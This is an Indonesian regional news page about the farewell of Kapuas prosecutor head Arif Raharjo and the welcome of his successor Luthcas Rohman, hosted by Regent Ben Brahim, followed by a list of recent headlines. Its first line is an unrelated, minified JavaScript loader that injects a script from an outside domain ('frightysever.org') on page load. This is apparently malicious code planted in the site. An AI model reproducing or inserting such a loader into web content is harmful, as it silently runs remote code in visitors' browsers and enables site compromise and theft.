(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Kenal Pamit Kajari Kapuas, Ini Kata Bupati Ben Brahim


KANALKALIMANTAN.COM, KUALA KAPUAS – Pergantian jabatan dalam institusi merupakan hal yang lumrah demi meningkatkan profesionalisme kerja.

Bagian dari proses kaderisasi dan penyegaran, sehingga diharapkan mampu meningkatkan sikap kepemimpinan, rasa tanggung jawab dan semangat kerja yang baik.

Hal itu disampaikan Bupati Kapuas Ir Ben Brahim S Bahat dalam acara ramah tamah dan kenal pamit Kepala Kejaksaan Negeri (Kajari) Kapuas di aula rumah jabatan Bupati, Senin (20/2/2023) malam.

Bupati Kapuas menyampaikan ucapan terima kasih kepada Arif Raharjo atas pengabdian dan dedikasinya selama bertugas sebagai Kejari di Kabupaten Kapuas.

 

Baca juga: Sekda Kapuas Tindak Lanjuti Hasil Evaluasi RB dan SAKIP

“Semoga semua pengabdian dan kinerja bapak menjadi nilai ibadah serta senantiasa diberikan keberkahan dan kami mendoakan agar kesuksesan menyertai bapak Arif Raharjo sekeluarga di tempat yang baru,” ucap Bupati Kapuas.

Ben Brahim juga mengucapkan selamat datang kepada Luthcas Rohman selamat bertugas di Kabupaten Kapuas sebagai Kajari Kapuas.

“Saya percaya, kekuatan sekecil apapun yang dimiliki oleh masing-masing kita, akan menjadi kekuatan yang besar jika kita saling bersinergi. Saya pun yakin bahwa di tengah kondisi dan kemampuan kita yang berbeda-beda, tentunya terkandung semangat kebersamaan yang tinggi, kepedulian yang besar, dan keikhlasan yang tulus untuk terus berbuat bagi Kabupaten Kapuas tercinta ini,: ujar Bupati Kapuas.

Pemkab Kapuas memberikan dukungan sebesar-besarnya kepada para aparat penegak hukum, baik itu kepolisian, pengadilan maupun kejaksaan dalam menjalankan tugas dan fungsinya. Keberadaan para penegak hukum tak hanya berperan sebagai mitra kerja, melainkan juga sebagai pengawas, pengayom dan pengamanan penyelengaraan pemerintahan demi suksesnya program-program pembangunan daerah.

Baca juga: Cuaca Buruk Tenggelamkan Kapal Nelayan di Perairan Aluhaluh, Empat Selamat Satu Belum Ditemukan

Sementara itu, Arif Raharjo didampingi istri mengucapkan terima kasih kepada semua pihak yang telah berkolaborasi menjalin hubungan baik bersama Kejari Kapuas terutama terima kasih kepada Bupati Kapuas.

“Saya berkeyakinan apa yang sudah dilakukan selama ini dapat menjadi modal positif untuk membuat Kabupaten Kapuas menjadi lebih baik,” ucap Arif Raharjo.

“Silaturahmi dan hubungan baik ini dapat terus terjalin meskipun dirinya sudah tidak lagi bertugas di Kabupaten Kapuas,” tandasnya.

Dilain pihak, Kajari Kapuas yang baru Luthcas Rohman mengucapkan terima kasih atas penyambutan yang sangat baik dari Pemkab Kapuas, dirinya berkomitmen akan melanjutkan pengabdian Kajari Arif Raharjo yang sudah tertata dengan baik.

“Ayo kita bekerja bersama-sama dengan cara dan keahlian masing-masing yang tertuju pada kemajuan Kabupaten Kapuas ini,” ajak Luthcas Rohman. (Kanalkalimantan.com/ags)

Reporter : ags
Editor : kk


Risa

Recent Posts

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

60 menit ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

4 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

5 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

6 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

7 jam ago

Hari Ini Masuk Asrama Haji, Kloter 1 Embarkasi Banjarmasin Berangkat Minggu

KANALKALIMANTAN.COM, BANJARBARU - Jelang kedatangan rombongan jemaah Haji Embarkasi Banjarmasin Kloter 1, Sabtu (11/5/2024), Petugas… Read More

8 jam ago

This website uses cookies.